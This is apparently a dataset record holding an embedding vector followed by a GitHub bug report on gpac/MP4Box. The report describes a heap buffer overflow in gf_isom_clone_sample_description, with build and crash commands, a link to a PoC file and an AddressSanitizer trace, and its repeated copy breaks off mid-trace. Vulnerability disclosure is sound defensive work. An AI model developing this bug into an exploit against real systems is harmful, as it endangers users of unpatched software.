0.0029296681750565767, -0.024031979963183403, -0.01577959954738617, -0.01068893726915121, -0.021856484934687614, -0.009521421045064926, -0.023277807980775833, -0.0222625769674778, 0.0011820195941254497, 0.008665726520121098, 0.010659931227564812, 0.025656351819634438, -0.007643243297934532, 0.010058043524622917, -0.021551914513111115, 0.0031163981184363365, -0.024670125916600227, 0.005935478489845991, -0.013640360906720161, 0.006983342580497265, -0.0031290885526686907, 0.0043074823915958405, -0.00940539501607418, 0.022973239421844482, 0.017244432121515274, 0.004354618024080992, -0.006899948697537184, -0.0243945624679327, 0.0060370019637048244, 0.005572895985096693, 0.01260337419807911, 0.022175557911396027, -0.001945256139151752, -0.002146489452570677, -0.015808604657649994, -0.019680988043546677, -0.011037017218768597, -0.013335791416466236, 0.006849186960607767, 0.002962300553917885, -0.004514154512435198, 0.0049492535181343555, 0.019768008962273598, 0.007320544682443142, 0.01872377097606659, 0.006591753102838993, -0.0181871484965086, -0.019724497571587563, 0.0013261461863294244, 0.02265416644513607, 0.002385794185101986, 0.00010645201109582558, 0.0005293707363307476, 0.012103009968996048, -0.010594666004180908, 0.016330724582076073, -0.004082681145519018, -0.014488804154098034, -0.014343771152198315, -0.007875296287238598, -0.0017920649843290448, -0.009564931504428387, 0.022683173418045044, 0.033502642065286636, 0.017171915620565414, 0.001168422750197351, -0.0019688240718096495, 0.008063838817179203, 0.015663571655750275, 0.004604800138622522, -0.014554069377481937, 0.0005248384550213814, 0.009992779232561588, 0.0033992126118391752, 0.006098640616983175, -0.006047879345715046, 0.010681685991585255, -0.010094301775097847, -0.000625908374786377, -0.0021845607552677393, 0.003462664783000946, -0.01117479894310236, 0.014300261624157429, 0.0003501189057715237, 0.010703440755605698, -0.019202379509806633, -0.016287215054035187, -0.00369109190069139, 0.003402838483452797, 0.007686752825975418, 0.015982644632458687, -0.004804220516234636, 0.009913010522723198, 0.00853519607335329, 0.013923175632953644, 0.0008824356482364237, -0.00006418846896849573, -0.01094999723136425, -0.02807840332388878, -0.01019582524895668, 0.009332878515124321, 0.026599066331982613, 0.007926058024168015, -0.04139243811368942, 0.007226272951811552, 0.0020068951416760683, -0.039536017924547195, -0.0026686086785048246, 0.002759254304692149, -0.01872377097606659, -0.0024619365576654673, -0.010166818276047707, -0.028803568333387375, -0.005986240226775408, -0.00886877253651619, 0.001997830579057336, -0.0021809348836541176, 0.012813672423362732, 0.007338673807680607, 0.03692542016506195, 0.004883988760411739, -0.018607743084430695, -0.002646853681653738, -0.027367740869522095, -0.027440257370471954, -0.009978275746107101, -0.008121851831674576, 0.03886886313557625, -0.045801445841789246, -0.014010194689035416, -0.0010007282253354788, 0.0012690394651144743, 0.016939863562583923, 0.0065990048460662365, -0.01931840553879738, -0.015300989151000977, -0.008092845790088177, 0.005358972121030092, -0.003272308735176921, -0.03405376523733139, -0.026323502883315086, 0.019434431567788124, 0.002956861862912774, -0.02062370255589485, 0.009427149780094624, -0.004796968773007393, -0.011522877961397171, 0.004615677520632744, -0.005079783499240875, 0.0004962850362062454, -0.003072888357564807, -0.007440196815878153, -0.018027611076831818, -0.0020703470800071955, -0.019303902983665466, -0.00022514119336847216, 0.026831118389964104, 0.017084896564483643, -0.016823837533593178, -0.022407609969377518, -0.0246991328895092, 0.02030463144183159, 0.0163017176091671, 0.01577959954738617, 0.008129104040563107, 0.004100810270756483, 0.007150130812078714, 0.007179137319326401, -0.021319862455129623, 0.016490260139107704, -0.027802839875221252, -0.002353161573410034, -0.017200922593474388, 0.008136355318129063, 0.019506948068737984, -0.008818010799586773, 0.003544245846569538, -0.005638160742819309, 0.0019833273254334927, 0.02249463088810444, 0.017868075519800186, -0.01363310869783163, -0.007723011076450348, -0.0005461401888169348, -0.0011892712209373713, -0.008237878791987896, -0.006504733581095934, 0.0018818042008206248, -0.009274865500628948, -0.005079783499240875, 0.009789732284843922, -0.010043540969491005, -0.02332131937146187, -0.02432204596698284, -0.01676582358777523, 0.0032106696162372828, -0.002732060616835952, 0.009456156753003597, -0.011290824972093105, 0.03463389724493027, -0.006272680591791868, 0.003970280289649963, 0.0007623300771228969, 0.03744754195213318, -0.016069665551185608, -0.0012944202171638608, 0.011921718716621399, 0.016939863562583923, 0.009767977520823479, 0.01159539446234703, -0.01159539446234703, -0.01480062585324049, 0.016417743638157845, -0.009506918489933014, 0.000817623978946358, -0.001217371434904635, 0.016475757583975792, -0.003549684537574649, -0.00951416976749897, 0.002695802366361022, -0.00826688576489687, -0.005083409138023853, -0.026149462908506393, -0.023828934878110886, 0.015286486595869064, 0.010819467715919018, 0.009891255758702755, 0.001623464049771428, 0.009318375028669834, -0.006751289591193199, -0.034314826130867004, 0.0012599749024957418, -0.011493870988488197, 0.019361915066838264, -0.008629468269646168, -0.006004369352012873, -0.006925329566001892, -0.0007632365450263023, 0.02498919889330864, 0.02545330487191677, 0.013241520151495934, -0.02725171484053135, -0.008448177017271519, 0.017244432121515274, -0.009071818552911282, 0.009274865500628948, -0.008361157029867172, 0.03765058517456055, 0.0026269115041941404, -0.00542061123996973, -0.006758541334420443, 0.01592463254928589, 0.0015600119950249791, -0.006388707086443901, 0.011153043247759342, -0.012371321208775043, 0.004296605009585619, 0.02613496035337448, 0.005387978628277779, -0.012436586432158947, 0.014771618880331516, 0.006899948697537184, -0.003774485783651471, -0.010739699006080627, -0.021189332008361816, 0.017549002543091774, -0.0009259455255232751, -0.005065280012786388, -0.012182778678834438, -0.008491686545312405, -0.005050776991993189, -0.006279932335019112, 0.018158141523599625, -0.007070362567901611, -0.007432945072650909, 0.0076940045692026615, 0.00558739947155118, -0.005866588093340397, -0.005039899609982967, 0.006936206948012114, 0.010108805261552334, 0.010819467715919018, -0.007723011076450348, 0.008839765563607216, 0.003062010742723942, -0.020565690472722054, 0.0004876737075392157, -0.004804220516234636, -0.025540323927998543, -0.006327067967504263, -0.02369840443134308, 0.02606244385242462, 0.010580162517726421, 0.013089234940707684, -0.013778142631053925, 0.0019851401448249817, -0.0027574412524700165, 0.02175496146082878, -0.029934827238321304, 0.0004278475826140493, -0.014655591920018196, -0.00905731599777937, 0.034401845186948776, 0.007853541523218155, 0.00040359984268434346, -0.00025698047829791903, -0.01781006157398224, -0.016127677634358406, 0.009825990535318851, -0.004684568382799625, -0.010137812234461308, 0.011907215230166912, -0.021870987489819527, -0.02680211327970028, 0.008970296010375023, -0.020551186054944992, -0.024438073858618736, 0.000550672470126301, -0.010848473757505417, -0.03738952800631523, -0.004169701132923365, 0.006276306230574846, 0.01019582524895668, 0.0011512000346556306, -0.018477214500308037, -0.016055161133408546, 0.003562374971807003, 0.013720128685235977, 0.0041116876527667046, 0.0017077644588425756, 0.0038868864066898823, 0.02272668294608593, 0.024597609415650368, -0.0026432278100401163, -0.014996419660747051, 0.007378557696938515, 0.008274137042462826, -0.01121105719357729, -0.00001497069933975581, -0.011725923977792263, -0.00940539501607418, -0.026323502883315086, 0.022741185501217842, 0.021348869428038597, 0.0294417142868042, 0.013553340919315815, 0.00823062751442194, -0.006588127464056015, -0.0023277809377759695, 0.003125462681055069, -0.001015231478959322, 0.016171187162399292, -0.01196522917598486, 0.0031272757332772017, -0.00608051149174571, 0.007541719824075699, -0.012733903713524342, 0.006105892360210419, 0.030021846294403076, -0.02462661638855934, -0.026033436879515648, -0.006863690447062254, 0.012617877684533596, 0.0020032692700624466, -0.02408999390900135, -0.004532283637672663, -0.00354787171818316, 0.016026154160499573, 0.017723042517900467, -0.0006512891850434244, -0.015895625576376915, 0.001437640399672091, -0.0022353222593665123, -0.016591783612966537, 0.01245834119617939, 0.0010043540969491005, -0.008890527300536633, -0.000811732024885714, -0.000964469974860549, -0.009209600277245045, 0.022915225476026535, 0.021958008408546448, 0.012480095960199833, -0.014162479899823666, 0.02883257530629635, 0.010464136488735676, -0.0062980614602565765, 0.007868044078350067, -0.011037017218768597, -0.01140685100108385, -0.0030166879296302795, 0.00973897147923708, -0.01238582469522953, -0.00811460055410862, -0.0051450482569634914, -0.011834698729217052, -0.0011185676557943225, 0.00879625603556633, 0.049050185829401016, 0.009137083776295185, -0.008876023814082146, 0.018230658024549484, 0.01728794351220131, 0.011696917936205864, 0.002766505815088749, 0.017186420038342476, 0.009825990535318851, 0.009753474034368992, 0.02771582081913948, 0.007686752825975418, 0.005968111101537943, 0.005329965613782406, -0.0015101569006219506, -0.00023409245477523655, -0.012958705425262451, -0.017650526016950607, -0.0004704510502051562, 0.03376369923353195, 0.02393045835196972, 0.00447427062317729, 0.004133442882448435, -0.029963834211230278, -0.022306086495518684, 0.004282101523131132, 0.0012200907804071903, -0.004347366280853748, -0.0058412072248756886, -0.014430791139602661, 0.024148007854819298, -0.00012633739970624447, -0.000589196861255914, 0.0037889890372753143, -0.026381516829133034, -0.015620062127709389, 0.017490988597273827, 0.009361885488033295, -0.0010968126589432359, 0.015199466608464718, -0.00447427062317729, 0.005525760352611542, 0.011544632725417614, 0.025569330900907516, -0.003272308735176921, 0.007168259937316179, -0.007469203323125839, 0.020580193027853966, -0.007066736463457346, 0.006091389339417219, -0.003217921359464526, 0.016142182052135468, 0.012668639421463013, 0.00883251428604126, -0.013060228899121284, 0.013415559194982052, 0.007248028181493282, -0.0041116876527667046, 0.006508359219878912, 0.004300230648368597, 0.015039930120110512, 0.014430791139602661, 0.027092179283499718, 0.004079055041074753, 0.007708508055657148, -0.005649038124829531, 0.0048441048711538315, -0.0026087823789566755, -0.025946417823433876, 0.013016718439757824, -0.018027611076831818, 0.02082674950361252, 0.00849893782287836, -0.014851386658847332, -0.02915164828300476, -0.0054061077535152435, 0.01820165105164051, -0.0008470838074572384, 0.00138234649784863, -0.00823062751442194, 0.0033937739208340645, 0.0011702356860041618, 0.011878209188580513, 0.011479368433356285, -0.01196522917598486, -0.017694035544991493, 0.0026051567401736975, 0.005464121233671904, -0.008085593581199646, 0.008876023814082146, -0.02976078726351261, 0.009390891529619694, -0.0010442381026223302, 0.00865122303366661, -0.001307110651396215, 0.025931913405656815, 0.03411177918314934, -0.002887971233576536, -0.009833242744207382, -0.02710668183863163, 0.005329965613782406, 0.0049238731153309345, 0.02551131881773472, 0.0025942791253328323, 0.0029296681750565767, -0.0049238731153309345, -0.011580890975892544, -0.011334334500133991, -0.002336845500394702, 0.01586661860346794, 0.004412631504237652, -0.013089234940707684, -0.027063172310590744, 0.0063161905854940414, 0.012342315167188644, -0.025192245841026306, -0.004405379761010408, -0.01577959954738617, 0.012480095960199833, -0.01396668516099453, -0.0002370384318055585, 0.012103009968996048, 0.00477521400898695, -0.0002576603146735579, -0.032284364104270935, -0.0000033496407922939397, -0.008477183058857918, 0.0021120442543178797, 0.013850659132003784, 0.024278536438941956, -0.004434386268258095, 0.0030293783638626337, -0.003970280289649963, 0.006849186960607767, 0.004470644518733025, 0.014561320655047894, -0.0051450482569634914, -0.008375660516321659, 0.017229929566383362, 0.0004273943486623466, 0.020449664443731308, 0.017795559018850327, -0.01992754451930523, -0.010507646016776562, -0.02976078726351261, -0.00643946835771203, 0.003270495915785432, -0.006504733581095934, -0.013125493191182613, -0.009637448005378246, -0.02976078726351261, 0.011008010245859623, 0.0029786168597638607, -0.01698337309062481, 0.013386553153395653, 0.010297348722815514, 0.000011033277587557677, -0.032052308320999146, 0.01256711594760418, -0.003934022039175034, 0.016127677634358406, 0.010645427741110325, -0.025192245841026306, 0.009064567275345325, 0.009695461019873619, -0.001308923470787704, 0.005181306507438421, -0.004971008747816086, 0.03596820309758186, -0.0018092875834554434, -0.0015645442763343453, 0.0005257449229247868, -0.012443837709724903, -0.036664362996816635, 0.009535924531519413, 0.01490940060466528, -0.00002172663516830653, 0.011820195242762566, -0.0021483025047928095, 0.0011865518754348159, -0.015953637659549713, 0.013843406923115253, -0.014952910132706165, 0.006986968219280243, -0.021247345954179764, 0.01457582414150238, 0.011225559748709202, 0.001775748678483069, 0.0010650866897776723, -0.0312691293656826, -0.008419170044362545, 0.004532283637672663, 0.007686752825975418, 0.033183567225933075, -0.0008742774953134358, 0.008622216060757637, -0.008955792523920536, -0.02854250930249691, -0.02107330597937107, 0.004521406255662441, 0.007715759798884392, -0.018259664997458458, 0.0021066053304821253, 0.01310373842716217, -0.014010194689035416, 0.01238582469522953, 0.012052248232066631, -0.010362613014876842, 0.006414087954908609, 0.008752746507525444, -0.004898492246866226, 0.011153043247759342, -0.0025960919447243214, 0.008375660516321659, 0.010014533996582031, -0.0187382735311985, -0.021696947515010834, 0.0018446394242346287, 0.00034286724985577166, -0.01586661860346794, -0.0027501897420734167, -0.037563566118478775, 0.02136337198317051, -0.00001574968518980313, 0.018607743084430695, 0.004684568382799625, -0.007385809440165758, 0.0032813732977956533, 0.0166062880307436, 0.00017607922200113535, 0.007073988206684589, -0.008165362291038036, 0.0012200907804071903, 0.003741853404790163, 0.018752776086330414, -0.0011638904688879848, 0.025583835318684578, 0.010565659962594509, -0.012168275192379951, 0.005746935494244099, -0.008027580566704273, 0.0013424623757600784, 0.03176224231719971, -0.01827416755259037, -0.014923903159797192, 0.01506893616169691, -0.0072552794590592384, -0.01721542701125145, 0.017723042517900467, 0.03556210920214653, 0.011066023260354996, -0.000654461735393852, -0.0008679323364049196, -0.003919519018381834, -0.0015137827722355723, 0.016707809641957283, -0.0002955048985313624, -0.004006538540124893, 0.00807834230363369, -0.013299533165991306, -0.000054925611038925126, 0.007164633832871914, 0.013045725412666798, -0.02211754396557808, 0.021551914513111115, 0.004383624531328678, -0.01547502912580967, -0.009064567275345325, 0.012748407199978828, -0.02243661694228649, 0.017157413065433502, -0.02279919944703579, 0.013081983663141727, 0.011783936992287636, 0.009760726243257523, 0.015446022152900696, -0.0074909585528075695, -0.0027701316867023706, -0.009173342026770115, 0.01181294396519661, -0.02204502746462822, 0.007498209830373526, -0.007940560579299927, 0.004035545513033867, -0.0062980614602565765, -0.0007827254012227058, -0.013560592196881771, -0.007577978074550629, -0.002661356935277581, -0.0018944945186376572, -0.001910810824483633, 0.027164695784449577, 0.025946417823433876, 0.018216153606772423, 0.0025707113090902567, -0.006287184078246355, 0.019579464569687843, -0.028498999774456024, 0.017345955595374107, -0.02100078947842121, 0.02543880231678486, 0.0020340888295322657, -0.004271224141120911, -0.013959433883428574, 0.01483688410371542, 0.00022026897931937128, -0.016185691580176353, 0.019158869981765747, -0.009100825525820255, 0.004234965890645981, 0.0016279963310807943, 0.001576328300870955, -0.00520668737590313, 0.018897809088230133, -0.017084896564483643, 0.008172613568603992, 0.03912992402911186, 0.013546089641749859, 0.010174070484936237, -0.002567085437476635, -0.005155925638973713, -0.004880363121628761, 0.01766502857208252, 0.017084896564483643, -0.017186420038342476, 0.0266425758600235, 0.006073260214179754, -0.011573639698326588, -0.013981188647449017, 0.00692895520478487, -0.002108418382704258, -0.0003664351243060082, -0.004053674638271332, 0.011080526746809483, -0.007853541523218155, -0.0035877556074410677, 0.03599720820784569, 0.005427862983196974, -0.014981917105615139, -0.03910091891884804, -0.0034064643550664186, 0.00789705105125904, 0.0005561112193390727, 0.0019833273254334927, 0.014213241636753082, 0.0017295194556936622, 0.010398871265351772, -0.0294417142868042, 0.013393804430961609, 0.021638935431838036, 0.006084137596189976, 0.0037708599120378494, 0.02303125336766243, 0.006620760075747967, 0.0013587786816060543, 0.001250003813765943, -0.002061282517388463, -0.00823062751442194, 0.003529742592945695, 0.0032287987414747477, -0.024496085941791534, -0.01261062640696764, -0.0010179509408771992, 0.002581588691100478, 0.003025752492249012, 0.020174100995063782, -0.010275593027472496, -0.0050253961235284805, -0.00556564424186945, 0.014641089364886284, 0.00014095402730163187, 0.023799927905201912, 0.000575146812479943, 0.027657806873321533, 0.00702322693541646, 0.009456156753003597, -0.0050217704847455025, -0.013038473203778267, 0.009028309024870396, 0.005239319987595081, 0.017694035544991493, 0.029325688257813454, 0.011160295456647873, 0.00034241401590406895, 0.006229170598089695, 0.0218999944627285, -0.017200922593474388, 0.008310395292937756, 0.005612779874354601, 0.01902833953499794, 0.01404645387083292, 0.016664300113916397, -0.009282116778194904, -0.0025580208748579025, -0.0005071625346317887, 0.023843437433242798, -0.020174100995063782, 0.026091450825333595, 0.008665726520121098, -0.011718672700226307, 0.007440196815878153, -0.014452545903623104, 0.024655623361468315, 0.004695445764809847, -0.0005257449229247868, -0.012037745676934719, 0.003268682863563299, -0.0045685418881475925, 0.03585217520594597, 0.003676588414236903, -0.006254551466554403, -0.005409733857959509, 0.019811518490314484, 0.01475711539387703, -0.036954429000616074, 0.022828206419944763, 0.0004235419037286192, 0.0017703099874779582, 0.024960191920399666, -0.012871685437858105, 0.011305328458547592, -0.001861862139776349, 0.00011381697549950331, -0.004630181007087231, 0.009354633279144764, 0.011066023260354996, -0.027005158364772797, -0.0018192586721852422, -0.006385080981999636, -0.004140694160014391, -0.016287215054035187, 0.020594697445631027, 0.003580504097044468, 0.010514898225665092, -0.004525031894445419, 0.0016524705570191145, -0.000609592127148062, 0.00046319939428940415, -0.005427862983196974, -0.009195096790790558, -0.013393804430961609, -0.015228472650051117, 0.0056852963753044605, -0.02726621739566326, -0.011428606696426868, 0.007868044078350067, 0.017171915620565414, 0.014677347615361214, -0.013524333946406841, 0.0014820568030700088, -0.01699787564575672, -0.0022461998742073774, -0.004912995267659426, -0.01461208239197731, -0.014844135381281376, 0.015533042140305042, -0.020797742530703545, 0.009760726243257523, -0.0037962407805025578, 0.034923963248729706, 0.022639663890004158, 0.0100072817876935, -0.0009354633511975408, 0.028557011857628822, -0.0023096518125385046, -0.0012182778446003795, 0.01415522862225771, 0.006715031340718269, 0.012748407199978828, 0.023959463462233543, -0.006287184078246355, 0.005870213732123375, -0.011609897948801517, -0.02696164883673191, -0.01253085769712925, -0.006849186960607767, 0.017041387036442757, 0.003549684537574649, -0.01091373898088932, -0.005257449112832546, -0.001137603190727532, -0.008578706532716751, -0.0026015308685600758, 0.006620760075747967, 0.014728108420968056, 0.007407564204186201, -0.018825292587280273, 0.016359731554985046, 0.009267613291740417, -0.006827432196587324, 0.004166075028479099, 0.0034372839145362377, 0.01475711539387703, 0.010870229452848434, -0.016736816614866257, -0.0032433022279292345, -0.019797014072537422, 0.006011621095240116, -0.0037636084016412497, -0.03274846822023392, -0.03834674507379532, 0.008136355318129063, -0.0006431310321204364, 0.02326330542564392, -0.01895582303404808, 0.0023821683134883642, 0.0056599159725010395, -0.008129104040563107, 0.0026504795532673597, 0.00562365772202611, 0.0034264065325260162, 0.00018899622955359519, -0.026483040302991867, 0.006058756727725267, -0.00003149937037960626, 0.012306056916713715, 0.022552642971277237, -0.010282845236361027, -0.009630195796489716, -0.016069665551185608, -0.002300587249919772, 0.022233569994568825, 0.01015956699848175, -0.00402104202657938, -0.005902846343815327, -0.026018934324383736, -0.0004124378028791398, 0.01483688410371542, 0.009891255758702755, 0.010979004204273224, 0.013604102656245232, 0.014474300667643547, 0.0028734677471220493, 0.005830329842865467, 0.007998574525117874, 0.0036149495281279087, 0.010507646016776562, -0.02152290940284729, -0.0047462075017392635, 0.003919519018381834, -0.01275565940886736, -0.0053045847453176975, 0.046468596905469894, 0.018158141523599625, 0.023393835872411728, 0.006693276576697826, -0.013604102656245232, 0.013096487149596214, -0.007947812788188457, -0.016171187162399292, -0.019361915066838264, -0.019869530573487282, -0.011675162240862846, 0.011682414449751377, 0.0187382735311985, -0.004539535380899906, 0.011109533719718456, 0.007795528043061495, 0.0019525077659636736, -0.007483706809580326, -0.013814400881528854, -0.019985558465123177, -0.012262546457350254, -0.018593240529298782, 0.007904302328824997, -0.01184920221567154, -0.006160279735922813, 0.0010823092889040709, 0.004989137873053551, -0.0034862325992435217, -0.004782465752214193, -0.003741853404790163, 0.03269045427441597, 0.006087763234972954, 0.0019869531970471144, 0.002023211447522044, 0.0035786910448223352, -0.009376388043165207, 0.028136417269706726, 0.02037714794278145, 0.012487348169088364, -0.03298052027821541, -0.004818724002689123, 0.00394852552562952, -0.002654105192050338, -0.008216124027967453, -0.00637782970443368, 0.015141453593969345, 0.012472844682633877, 0.010696189478039742, 0.01192897092550993, 0.0243945624679327, 0.0156345646828413, -0.0017141096759587526, -0.018317677080631256, 0.01468459889292717, -0.0055801477283239365, 0.012414831668138504, -0.004673691000789404, -0.010217580012977123, 0.0003174864687025547, -0.013843406923115253, -0.004147945903241634, -0.005645412486046553, -0.0009336504153907299, -0.0076142363250255585, -0.01804211549460888, -0.00868748128414154, 0.01615668460726738, 0.006725908722728491, -0.0218999944627285, 0.03292251005768776, 0.004238591529428959, 0.0011158481938764453, -0.002389419823884964, 0.003170785726979375, -0.009166090749204159, 0.0008810759172774851, 0.008789004758000374, -0.0043111080303788185, 0.018288670107722282, -0.005039899609982967, 0.013843406923115253, -0.014459798112511635, 0.02145039103925228, 0.003595007350668311, 0.004071803763508797, 0.009543176740407944, -0.007012349087744951, -0.0019325657049193978, -0.01956496201455593, 0.017186420038342476, 0.022596152499318123, -0.012864434160292149, -0.00818711705505848, -0.005707051604986191, 0.01023208349943161, -0.005090660881251097, 0.0010170444147661328, -0.003723724279552698, 0.0003929490048903972, -0.008963043801486492, 0.022480126470327377, -0.010384367778897285, -0.029963834211230278, 0.012654135935008526, 0.01886880397796631, 0.01570708304643631, -0.003598633222281933, -0.007810031063854694, -0.021798470988869667, 0.0187382735311985, 0.012784665450453758, 0.008622216060757637, -0.022770192474126816, -0.010979004204273224, 0.01683834008872509, 0.00036552868550643325, -0.005714303348213434, -0.001749461516737938, 0.016171187162399292, 0.010870229452848434, 0.000995289534330368, 0.004336488898843527, 0.009905759245157242, 0.022784696891903877, 0.0070341043174266815, 0.012668639421463013, 0.005670793354511261, 0.011189301498234272, -0.01196522917598486, 0.027918867766857147, 0.004974634386599064, -0.009492415003478527, 0.020014563575387, 0.006968839094042778, 0.00004161202741670422, 0.018767280504107475, -0.011348837986588478, 0.0166062880307436, 0.017157413065433502, 0.00411531375721097, 0.009934765286743641, 0.06659919023513794, -0.010659931227564812, -0.008847017772495747, 0.004535909276455641, 0.013618606142699718, 0.0023785424418747425, 0.006359700579196215, 0.000882888853084296, -0.013589599169790745, 0.0004353258409537375, 0.03796966001391411, 0.024931184947490692, -0.009180593304336071, 0.0024129878729581833, 0.00003421874134801328, 0.008375660516321659, 0.004245843272656202, -0.011414103209972382, 0.014561320655047894, -0.014336519874632359, -0.011457612738013268, 0.0011249127564951777, -0.007831785827875137, 0.0022987741976976395, -0.008071091026067734, -0.004927498754113913, -0.029731780290603638, -0.006323442328721285, -0.0166062880307436, -0.013350294902920723, 0.0012445651227608323, 0.0034390967339277267, -0.006073260214179754, 0.016577281057834625, -0.0024220524355769157, 0.012480095960199833, -0.00621104147285223, 0.013480824418365955, 0.0025380789302289486, 0.008680230006575584, 0.03135615214705467, -0.0134735731408, 0.01931840553879738, 0.03640330210328102, -0.01396668516099453, 0.003480793908238411, -0.0069543360732495785, 0.0020032692700624466, 0.00008486700971843675, 0.008818010799586773, -0.014952910132706165, 0.002940545557066798, -0.011109533719718456, -0.0012898879358544946, 0.016287215054035187, 0.0131399966776371, -0.0024764398112893105, 0.03593919798731804, 0.009100825525820255, -0.019753504544496536, -0.019956551492214203, 0.002630537375807762, 0.025351781398057938 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
## Description There is a heap buffer overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1687-g16bd902cb-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## crash command ``` MP4Box -frag 1 -out /dev/null poc_file ``` ## Pocs [poc.zip](https://github.com/gpac/gpac/files/7976839/poc.zip) ## Crash output ``` ==21109==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000001f18 at pc 0x0000008236c0 bp 0x7fff8b60e4b0 sp 0x7fff8b60e4a8 WRITE of size 2 at 0x606000001f18 thread T0 #0 0x8236bf in gf_isom_clone_sample_description /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4355:51 #1 0xd774b5 in mp4_mux_cenc_update /programs/mp4box/builds/build6/src/filters/mux_isom.c:3564:8 #2 0xd6ab36 in mp4_mux_config_timing /programs/mp4box/builds/build6/src/filters/mux_isom.c:5863:6 #3 0xd6ab36 in mp4_mux_process /programs/mp4box/builds/build6/src/filters/mux_isom.c:6033:3 #4 0xb7c2ae in gf_filter_process_task /programs/mp4box/builds/build6/src/filter_core/filter.c:2515:7 #5 0xb5d7eb in gf_fs_thread_proc /programs/mp4box/builds/build6/src/filter_core/filter_session.c:1756:3 #6 0xb5c694 in gf_fs_run /programs/mp4box/builds/build6/src/filter_core/filter_session.c:2000:2 #7 0x910850 in gf_media_fragment_file /programs/mp4box/builds/build6/src/media_tools/isom_tools.c:3816:6 #8 0x4e6fcc in mp4boxMain /programs/mp4box/builds/build6/applications/mp4box/main.c:6455:7 #9 0x7fdce2d3b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x41ea6d in _start (/programs/mp4box/builds/build6/bin/gcc/MP4Box+0x41ea6d) 0x606000001f18 is located 0 bytes to the right of 56-byte region [0x606000001ee0,0x606000001f18) allocated by thread T0 here: #0 0x499ccd in malloc (/programs/mp4box/builds/build6/bin/gcc/MP4Box+0x499ccd) #1 0x12c089f in unkn_box_new /programs/mp4box/builds/build6/src/isomedia/box_code_base.c:804:2 #2 0x7af0c1 in gf_isom_box_new_ex /programs/mp4box/builds/build6/src/isomedia/box_funcs.c:1677:17 #3 0x7ad48d in gf_isom_box_parse_ex /programs/mp4box/builds/build6/src/isomedia/box_funcs.c:240:12 #4 0x823151 in gf_isom_clone_sample_description /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4336:6 #5 0xd774b5 in mp4_mux_cenc_update /programs/mp4box/builds/build6/src/filters/mux_isom.c:3564:8 #6 0xd6ab36 in mp4_mux_config_timing /programs/mp4box/builds/build6/src/filters/mux_isom.c:5863:6 #7 0xd6ab36 in mp4_mux_process /programs/mp4box/builds/build6/src/filters/mux_isom.c:6033:3 #8 0xb7c2ae in gf_filter_process_task /programs/mp4box/builds/build6/src/filter_core/filter.c:2515:7 #9 0xb5d7eb in gf_fs_thread_proc /programs/mp4box/builds/build6/src/filter_core/filter_session.c:1756:3 #10 0xb5c694 in gf_fs_run /programs/mp4box/builds/build6/src/filter_core/filter_session.c:2000:2 #11 0x910850 in gf_media_fragment_file /programs/mp4box/builds/build6/src/media_tools/isom_tools.c:3816:6 #12 0x4e6fcc in mp4boxMain /programs/mp4box/builds/build6/applications/mp4box/main.c:6455:7 #13 0x7fdce2d3b0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4355:51 in gf_isom_clone_sample_description Shadow bytes around the buggy address: 0x0c0c7fff8390: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa 0x0c0c7fff83a0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff83b0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff83c0: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff83d0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 =>0x0c0c7fff83e0: 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21109==ABORTING ------------------------ ```
There is a heap buffer overflow detected by AddressSanitizer
https://api.github.com/repos/gpac/gpac/issues/2086/comments
0
2022-02-01T08:16:21
2022-02-01T14:29:19Z
https://github.com/gpac/gpac/issues/2086
1,120,358,857
2,086
false
This is a GitHub Issue repo:gpac owner:gpac Title : There is a heap buffer overflow detected by AddressSanitizer Issue date: --- start body --- ## Description There is a heap buffer overflow detected by AddressSanitizer ## System info ``` Ubuntu 20.04.2 LTS clang version 12.0.0-++20210402082642+04ba60cfe598-1~exp1~20210402063359.71 MP4Box - GPAC version 1.1.0-DEV-rev1687-g16bd902cb-master ``` ## Build command ``` ./configure --static-mp4box --prefix=`realpath ./install` --enable-sanitizer --cc=clang --cxx=clang++ ``` ## crash command ``` MP4Box -frag 1 -out /dev/null poc_file ``` ## Pocs [poc.zip](https://github.com/gpac/gpac/files/7976839/poc.zip) ## Crash output ``` ==21109==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x606000001f18 at pc 0x0000008236c0 bp 0x7fff8b60e4b0 sp 0x7fff8b60e4a8 WRITE of size 2 at 0x606000001f18 thread T0 #0 0x8236bf in gf_isom_clone_sample_description /programs/mp4box/builds/build6/src/isomedia/isom_write.c:4355:51 #1 0xd774b5 in mp4_mux_cenc_update /programs/mp4box/builds/build6/src/filters/mux_isom.c:3564:8 #2 0xd6ab36 in mp4_mux_config_timing 